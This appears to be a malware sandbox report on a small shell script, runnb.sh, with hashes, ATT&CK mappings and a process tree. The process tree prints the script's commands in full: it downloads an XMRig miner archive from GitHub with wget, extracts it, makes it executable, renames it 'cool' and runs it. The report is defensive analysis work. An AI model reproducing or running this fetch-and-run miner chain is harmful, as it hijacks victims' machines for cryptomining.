a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

Analysis

max time kernel
57s
max time network
1679s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
30-10-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

runnb.sh
Size

213B
MD5

a1189543e2f98f6696c6d857b899ab0a
SHA1

30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512

472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score

7^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

762 chmod
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

718 sudo

pid	process
762	chmod

pid	process
718	sudo

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

dpkgtarmvsudoaptdpkg

description	ioc	process
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/filesystems	dpkg

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

Processes:

apt

description	ioc	process
File opened for modification	/tmp/fileutl.message.Pvz8pq	apt
File opened for modification	/tmp/fileutl.message.mXRjMW	apt
File opened for modification	/tmp/fileutl.message.Pq8IyG	apt
File opened for modification	/tmp/fileutl.message.0U0kud	apt

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:714

/usr/bin/sudo
sudo apt install wget
2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:718

/usr/bin/apt
apt install wget
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:731

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:738

/usr/bin/wget
wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
2⤵
PID:760

/bin/tar
tar xvf xmrigtar.tar.gz
2⤵
- Reads runtime system information
PID:761

/bin/chmod
chmod +x xmrig
2⤵
- File and Directory Permissions Modification
PID:762

/bin/mv
mv xmrig cool
2⤵
- Reads runtime system information
PID:763

/tmp/cool
./cool
2⤵
PID:764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads